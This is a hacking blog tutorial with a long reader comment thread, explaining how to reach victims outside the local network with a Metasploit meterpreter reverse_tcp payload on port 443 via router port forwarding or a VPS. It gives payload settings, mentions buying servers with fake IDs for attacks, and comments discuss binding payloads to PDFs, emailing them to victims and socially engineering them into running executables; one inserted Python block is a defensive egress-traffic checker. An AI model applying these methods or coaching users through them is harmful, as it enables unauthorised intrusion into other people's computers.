How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic


Type : Tutorial

Level : Medium, Advanced

A few days ago someone sent me a message through the contact form on this website, asking, "Is it possible to do hacking outside the LAN (Local Area Network)?" If you look at all of my articles, 80% of the hacking articles were written for a Local Area Network, because I work in my own lab. So how about hacking outside the Local Area Network? Of course, it follows the same logic as attacking from inside a Local Area Network 🙂.

Requirement :

1. Virtual Private Server (VPS). For a VPS with Backtrack 5 already installed, you can view here (but you can also install it yourself)

2. Dedicated Server

3. Cloud Server (I haven't tried this 🙂), e.g. Amazon

4. Internet with a public IP

5. A router you can control yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay, let's start with the Virtual Private Server (VPS). This type of hosting gives you the freedom to install any software you want on a virtualized server, because it gives you the flexibility to manage your server yourself (DIY) 🙂

2. A Dedicated Server works almost the same as a VPS (Virtual Private Server), but usually you have your own machine and put it in a data center (or the service provider rents you their machine). This hosting type also allows you, as the user, to manage the system yourself. You can do anything to your server and install anything you want on it.

3. Cloud server –> I haven't tried this… maybe someone can share 🙂

4. You have internet with a public IP address… usually when you subscribe to 1:1 internet bandwidth, they also give you 1 public IP.

5. Control the router ourselves to redirect incoming or outgoing connections.

Before we continue to the next step, let's look at the figure below (I will try to explain it in a simple way):

[Figure: Hacking WAN not LAN]

Information(Attacker) :

– Attacker1 uses local IP address –>

– Attacker1 has public IP address –>

– Attacker1 can control his router to redirect any incoming/outgoing traffic.

– Attacker2 uses a VPS/Dedicated/Cloud server that is connected directly to the internet to do an attack.

Information(Victim) :

– Victim1 has local IP address –>

– Victim1 is connected to the internet via router+firewall; this firewall only allows ports 80 and 443 for outgoing connections

– Victim2 is connected directly to the internet with IP address –>

How to Attack? :

The network topology I drew above uses almost the same method of attack in each case. You should know the typical rules an administrator applies when setting up a firewall (in this case, the network administrator who administers the router for victim1). AFAIK they usually open specific ports like :

TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website

TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS

etc(you can scan it first but be careful).

From the information above, an attacker can usually create a payload and options like this :

set payload windows/meterpreter/reverse_tcp

set lhost

set lport 443

When the attack is launched successfully, the payload will try to connect to the IP address set in lhost on port 443. The attacker uses port 443 because he knows that the victim1 firewall only allows ports 80 and 443 for outgoing connections. If you configure the payload to use another port, the victim1 firewall will drop the packets, because it drops everything going out on any port other than 80 and 443. For the next step, the attacker should configure his router to redirect all incoming traffic on port 443 to his local IP address.

You can see an example port forwarding tutorial for the WRT54G router here. Actually, all routers have a similar option for port forwarding 🙂

Update :

If you use a Windows machine as a router, you can read the port forwarding tutorial here (How to do port forwarding in Windows).
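
From the defender's side, the outbound rule described above (only ports 80 and 443 allowed) checks the port number, not the protocol, which is why a raw TCP session on port 443 gets through. The following added example (not from the original post) flags flows on those two ports whose first bytes are not an HTTP request or a TLS ClientHello; the Flow record, the sample flows and the addresses are constructed for illustration.

```python
"""Added example: protocol-conformance check for outbound flows on ports 80/443."""
from dataclasses import dataclass

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                b"OPTIONS ", b"CONNECT ", b"PATCH ", b"TRACE ")


@dataclass
class Flow:                 # hypothetical record, e.g. built from a flow/pcap export
    src: str                # internal client
    dst: str                # external server
    dport: int              # destination port
    first_sender: str       # "client" or "server": who sent payload data first
    first_bytes: bytes      # first payload bytes seen in the flow


def is_tls_client_hello(data: bytes) -> bool:
    # TLS record header: type 0x16 (handshake), version 0x03 0x00..0x04,
    # 2-byte length, then handshake type 0x01 (ClientHello).
    return (len(data) >= 6 and data[0] == 0x16 and data[1] == 0x03
            and data[2] <= 0x04 and data[5] == 0x01)


def is_http_request(data: bytes) -> bool:
    return data.startswith(HTTP_METHODS)


# Protocol each allowed outbound port is expected to carry.
EXPECTED = {80: is_http_request, 443: is_tls_client_hello}


def classify(flow: Flow) -> str:
    check = EXPECTED.get(flow.dport)
    if check is None:
        return "port-not-allowed"
    # In both HTTP and TLS the client always speaks first.
    if flow.first_sender != "client":
        return "suspicious: server spoke first"
    if not check(flow.first_bytes):
        return "suspicious: protocol mismatch"
    return "ok"


def review(flows):
    """Return (src, dst, dport, verdict) for every flow that is not 'ok'."""
    results = [(f, classify(f)) for f in flows]
    return [(f.src, f.dst, f.dport, v) for f, v in results if v != "ok"]


# Constructed sample flows (documentation address ranges, made-up bytes).
SAMPLE_FLOWS = [
    Flow("10.0.0.21", "198.51.100.7", 443, "client",
         bytes.fromhex("1603010200010001fc0303")),           # TLS ClientHello
    Flow("10.0.0.21", "198.51.100.9", 80, "client",
         b"GET /index.html HTTP/1.1\r\n"),                   # plain HTTP
    Flow("10.0.0.35", "203.0.113.50", 443, "server",
         bytes.fromhex("0002b400a1b2c3d4")),                 # opaque binary, server first
    Flow("10.0.0.40", "203.0.113.60", 443, "client",
         b"SSH-2.0-OpenSSH_9.6\r\n"),                        # non-TLS protocol on 443
    Flow("10.0.0.40", "203.0.113.61", 8443, "client", b"\x16\x03\x01"),
]

if __name__ == "__main__":
    for row in review(SAMPLE_FLOWS):
        print(row)
```

A port-only egress rule passes both suspicious 443 flows; enforcing this check usually means sending outbound web traffic through a proxy or a firewall that validates the protocol rather than only the port.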

Oops… I almost forgot to explain how to do that from a VPS/Dedicated/Cloud server…

Actually, from a VPS/Dedicated/Cloud server it is easier and also safer (maybe.. LoL), because a lot of hackers use this kind of service… they buy it using a fake ID (hit and run) and then perform an attack from the server. The logic is almost the same as what I've already explained above.

You should remember that every action has consequences, whether good or bad. Before you do something, you should know the consequences you will face later. Be wise 🙂

Hope you found it useful.

If any information I wrote here is wrong, let me know and I'll correct it 🙂


  • There is a related and interesting blog post on the Netresec blog about how the meterpreter reverse_https backdoors can be detected.

  • Xt

    A demo video of this would be helpful. 

    • v4L

      sorry for that, but you can do it yourself when you have the requirement I describe above

  • w0lF 3¥e

    V4L i lik ur tuts… 🙂
    I,ve a problem! My ISP provides a dynamic Wan ip so….i created account in no-ip and created a host…& installed DUC their free client program…then i port forwarded my router to my Lan ip…..DO I HAVE TO PROVIDE THE NO- IP HOSTNAME IN LHOST IN METASPLOIT PAYLOAD SETTING…PLS XPLAIN HOW TO USE NO-IP HOST NAME IN ORDER TO PROPERLY GET MY METERPRETER REVERSE CONNECTION!!! PLS HELP V4L!

  • Nice info master, great. 🙂

  • Hitch4000

    nice tutorial!
    I was just wondering, if you don't have a static IP. Couldn't you just use no-ip( to create a hostname to point to your dynamic IP?

    And then set localhost like this: set lhost <yourhostname>
    Bind the payload to an PDF file, and mail it to a victim

    Do you think this is possible?


    • v4L

      Yep it’s possible 🙂
      I’ve already written about it here and here

  • Bro How To Setup VPN ? :@

    • v4L

      Maybe 1st you can see the explanation about VPN here, because VPN and VPS is something totally different.
      If you ask about VPN, you can use program like TOR, HotSpot Shield, OpenVPN, etc…
      but if you ask about VPS, you can ask further to your hosting provider about how to set it up(fyi:it’s not a free service you should pay monthly fee).

  • Bro, just tell me one thing: in the method you gave for port forwarding, is the IP in it the router's IP or the host's IP?

  • Papgaur

    Do u have to use backtrack to hack a remote pc ? I only have metasploit with armitage. can u use just this instead? will it work on windows 7???

    • v4L

      You can also use it in Windows, afaik there’s metasploit in Windows…but if you use Linux (I’m using Backtrack) it will be simpler and easier. I suggest using Backtrack because this distro is already designed to do computer hacking / pentest.

  • Mohit

    hey bro how to OPEN closed port m using USB DONGLE nd my ISP has BLOCKED ALL when i practice ur attack in my lab i didn't get successful due to closed ports.
    one more thing how to use metasploit to hack web server. and web application give me ny tutorial

    • v4L

      usually an ISP server will not block all of your port, but they will filter it. If you use USB dongle, it just affect your PC, not a whole network.
      you need to find which port are open both victim & attacker (usually port 80, 443, etc)

  • sivaraaj

    Sir how to install VPS server….?

    • v4L

      you should buy it, then you can install it… 🙂 the most easy way you can buy an internet packet from your provider with public ip address…

  • orsettobubu

    I managed to configure a DNS server so that the external client use my DNS server but when the client enters into facebook giousto dns not resolve the false one.
    How to use a dns server CENTOS I miss something in the configuration of named.conf? I hope it can help

    • v4L

      hmm…yep I think maybe you miss something in your configuration…

  • subiyanto

    yup, really ok**for us the oppressed**for education**

  • piyush

    hey im a big fan of your blog and hats off to your tutorials 😀
    ok let me get to the point
    i was trying to port forward my router so that i can use metasploit over the net but unfortunately it isnt working i dont know why
    here are the settings which i used:-
    in the port forwarding tab i have given my local ip address:192.168.1.x
    with the port no:443
    i have configured the network of my virtual machine to bridge 
    in back track i have configured it to use a static ip: 192.168.1.x(which i have configured in the router in the port forwarding tab)
    after doing all this and setting a credential harvester method i gave my ip to my friend(192.168.1.x)
    but nothing , he said it gave a 404 error 
    i dont know why 🙁
    please help me out in doing port forwarding stuff if im doing it wrong

    • v4L

      if you give that ip 192.168.1.x to your friend, of course won’t’s local port…you should give your router address..
      on your router usually there’s forwarding port…so when someone open ip like : the router should redirect that request to your local ip address.

  • piyush

    thanx for your lightning fast comment bro… 😀
    i have done accordingly you said but when i use the java applet attack method it ask me if in using a NAT i type "yes" 
    then it says IP address of the set web server i type "my local IP"
    then it says is your payload handler on different IP i type "no"
    after all that it says failed to blind to 
    i dont know why ?
    please help 
    and im a NOOB please do elaborate 

    • v4L

      ip address of set web server should be your router, your router will forward every incoming packet that come to port 80 to your local IP.

  • joand

    HI .
    I read your tuts thats very cool really.. i need your help little )) how can i find other computers in my lan ..everytime i try nmap result is 1 host up(thats me) ..i want to try sslstrip but for that i dont find any computer for proceed ..i have beetel router ..i hope you can solve this issue ))

    • v4L

      did you have other clients connected with your local network?
      if yes and you still find nothing, then it’s because the firewall blocked your nmap request.
      if you ask to scan other ip outside your network, the answers is yes and no….
      yes if you can route your network to the network destination you want to scan
      no if you can’t do that

  • joand

    hi someone can tell to scan ip behind the router …because everytime i scan wd nmap result is 1 host i can get other host computer

  • rk

    I was waiting for the stuff for years… the way u explained is just Great

  • joand

    thank perfect answer ))))

  • jaond

    do need to telnet every WAN ip to execute MITM? even i have access to router login and password..can you please make a detail tutorial on MITM on WAN?  it is possible to telnet WAN ip ?

    • v4L

      btw usually MITM do inside a local network(but doesn’t mean it can’t do in public network)…
      yes you need to remote your server on the internet…but it’s better to learn on your local network..
      yes it’s possible if the server has a vulnerability.

  • joand

    Sir the problem is i do not have any other host computer in my lan network…and i want to know how can i find other host computer to execute any attack like MITM?

    • v4L

      if you already know the logic for this MITM, it will much easier for you to understanding further…
      if not, then my suggestion is : it’s better you try on your local network..if you don’t have other computer, then build a virtual machine and learn + try it first on your computer how to perform this.

  • joand

    i have virtual machine backtrack OS .and i do successfully mitm on my window xp….and got all the ssl logs… in Lan all successful execute
    as i say i have two ip ..lan is .192.168.1.x…and wan ip is 122.145.23.x like that..scan wan ip i got result many host ip live . …here is the question how can i redirect all outgoing and incoming traffic of these wan ip's through my host computer..
    please if possible tell in detail thank you for your previous reply 🙂

    • v4L

      If you can do that on your local network, then it remains the same for public…

  • joand

    if i knew how to do it i would not ask you LOL …

  • joand

    Give a man a fish …make me smile ))) it true indeed
    i know a guy who is also alone in his lan network but he is doing mitm successfully on other guys comp..just dnt know how he get these comps for attack ..and he dnt even want to tell me lol ))) i try my best to find way but smtimes got confuse and run in many directions ))

  • Baldassarre

    Hi v4L, 
    your tutorials are great.
    For this kind of attack, how can I find the victim's open ports? For example I have his public ip and then what I have to do? I've tried to forward a port and it succeeded, it was really open that port, but I need to forward a port that the victim has open too! How can I find it?
    I thank you for your time

    • v4L

      Actually if you saw the picture, you can scan victim 2 directly;
      but if it was victim 1, while you scan the ip, it’s not actual victim 1 ip address but it was the router(victim 1 was behind the router).
      btw if you read this tutorial, it wasn’t talk about scanning ip address or something you describe in your question. 🙂

  • timetraveler

    Hi my friend, I have port forward my router and i made a nessus scan of a remote host. It’s vulnerable and i’m trying to exploit it. How do i set up my payload, should i set my open port or should i set the port of the vulnerable application (php)?

  • john D

    Hello.i want to ask if the hack is possible to made without the VPS or other host server just using our internal or external IP can be work?thanks a lot

    • v4L

      #john D
      you can view my other post here http://www./hacking-tutorial/how-to-hacking-wan-internet-by-using-public-dynamic-ip-address/

  • Avinash

    can we hack any internet service provider and can use internet free of cost with airtel,docomo,idea?

    • v4L

      oops i didn’t know about it…i also didn’t use their service 🙂

  • Deepsa

    hi, i want to remote access xp cmd in lan via ip address through lhost and rhost method i’m using backtrack r1 …do not want to use any virus, pdf, link etc,etc…i just know victim local ip address …will u plz help me

    • v4L

      then the answer is NOT.
      only a vulnerable OS you can do like that.

  • sniffer

    thanks Bro

  • Bree

    Hi , I dont have access to the router administration (only my father have the pswd :p and won’t give it to me )I’m runing bt can I do NAPT just by using iptables in order to do this : : 443 = xx.xx.xx.xx : yyy
    xx.xx.xx.xx is my public ip and yyy the port that the payload will use .. help please :'(

    • v4L

      you need to have an access to your router

      • Bree

        ok thanks a lot 🙂

  • Rahul

    can we hack a PC which is from another country or another state or city?
    let me clear it if i want to hack a pc and he has their own internet connection and i have a pc and i have my own internet connection. can i hack ? or for WAN hacking 1st we need to connect our backtrack with their internet(WAN) ?

    • v4L

      maybe you can use client hacking.

      • Rahul

        thanks for reply…. sorry didnt get client hacking any article on this ?

  • Ronit

    hello vishnu ….
    i need to know that how can i remotely control my cafes route from my home with a laptop via internet…

  • jason

    This things was as easy as 123 for me before. That was when I still on a static IP and have a router. But I moved to a place where I can only connect to the cyberspace via 3G dongle that is behind an ISP NAT and have a Dynamic IP.
    Any advice on doing this using 3G dongle? I also don't have a router to port forward to my local ip. I tried No-IP but it didn't work.

    • v4L

      you must have a full control to your router to forward incoming packet to your local network.

  • zain

    u didnt told what ip address we have to set for victim wan ip or local ip coz if we set wan ip it will only connect with router not lan ips explain plz

    • v4L

      that’s why you need to forward the packet from router to your local network.
      if you use router box, find your manufacturer brand and find how to do port forwarding e.g:
      if your router is a pc(windows), see here http://www./hacking-tutorial/spi-port-forward-redirection-for-windows-to-another-port-ip-address/

      • c4

        port forward at attacker side or client side or both?

        • v4L


          attacker side

          • c4

            thank u sir for ur quick response

  • Jake Lancaster

    I was wondering when u say Attacker1 & Attacker2 those are just 2 different ways you can* attack correct you dont actually have to have 2 attackers?

    • v4L


      yes correct…you can choose one of them or if you have both also ok

  • victor

    Thanks for your tutorial …

    An ISP assigns dynamic IPs to its subscribers via WIFI or 3G dongle. the question is:

    Will the wan hack work in this scenario? I don’t think so, but if yes how port forwarding works?

    • v4L


      it’s depend how the ISP share their dynamic IP, whether they use public or private IP.

      if use private, port forwarding will not work except you can access their router. If public, yes you can directly connect to your machine.

      • victor

        Now it’s become very clear to me.

        Thanks, perfect answer! very appreciate.

        • nomad

          it’s certainly public but the ip will only change if you reconnect the router, if your router doesn’t reconnect by itself (like mine which is a pain in the ass) you’ll be fine

  • root

    when i port forwarding , and i scanned my ip with nmap to see if the port is open that show port filtered , that mean is working? or it isn’t?

    • v4L


      if your IP was behind NAT, maybe it’s your firewall IP and they filter it.

  • nomad

    a question, if i use RPORT 443 and another LPORT like… LPORT 666, will it work if i forward port 666 to my attacker machine ?

  • TheKingofdemon33

    How do i port forward iPhone hotspot internet? Please help.

  • hunter

    should i connect wire to wire with local lan to perform attack out of lan??

  • Frank

    I’ve read over this many times. I see how you attack victim 2. Of course. But victim 1 is behind the router so how do you direct a query to a LAN side up without being on the network? I know I can ping a router public ip (wan) but if I’m not on the network I can’t see anything on the other side.

    • Alex

      Well, how about hacking a router first, you may use some exploit for that (Loads of routers are exploitable now), connect to the router using telnet/ssh? the problem is to connect to the computers on that local network, but i am sure there is a solution just try to google it. I am sorry if my answer is not something you are wondering of. My language is not so good, so i might have wrongly understood the question 🙁

    • XoRR

      both are behind a router (NAT) this is why attacker is using a reverse shell so victim will connect to you thats why attacker doing port forwarding, e.g you send and exe that you have injected with payload and tell it that “hey exe when you got clicked please connect back to this ip using usually open ports like 80 8080 or 443” so it doesn’t matter if victim is in another network and you dont need to know or worry about victims ip or network, all you have to is to social engineer the victim to open that exe and BOOM!!

    • gouranga#!

      You can see everything by angry ip scanner

  • Mi

    Just a quick question and I hope the writer of this article still replies 😛 , is there anyway to scan ip addresses/ MAC addresses connected on WAN as we do in LAN? I really need to know this, thanks for the article by the way.

  • vickki

    can u explain in detail how to set up vpn/dedicated/cloud

  • vickki

    and can u make a tutorial for bash file scripting or bash scripting to bypass login for downloading free pdf or free e newspaper etc

  • XoRR

    can i put my VM into DMZ? if yes than plz tell me how?
    so if it could be added in DMZ than do i still need to forward ports and using NO-IP or just giving away my VM’s IP to targets to get a reverse meterpreter shell ?

  • optic

    i have a access point and many client (windows xp,7,8 and android phone) can To introduce tutorial for hacking this clients?

  • sk

    Hey! Nice article Vishnu
    I am using the Social Engineering Toolkit of Kali-Linux to create a payload and listener. I have a public ip address. What ip address should i use for RHOST? plz suggest. Also if i want to know LHOST then how do i get the ip address? Thanx in advance!

  • Mohammed Hanafy Ali

    but how to do the attack without luring target to click a link if i have no contact with target (a black box) … how to get to the remote machines behind that router??

  • yash

    is there a way to hack without any exe file, letting it be a difficult task, but is it possible?

  • mr x

    When hacking a remote pc over internet, will my ISP detect and also while entering the victim will his ISP(different from mine) detect?

  • sid

    how to hack outside lan while using tor or proxychain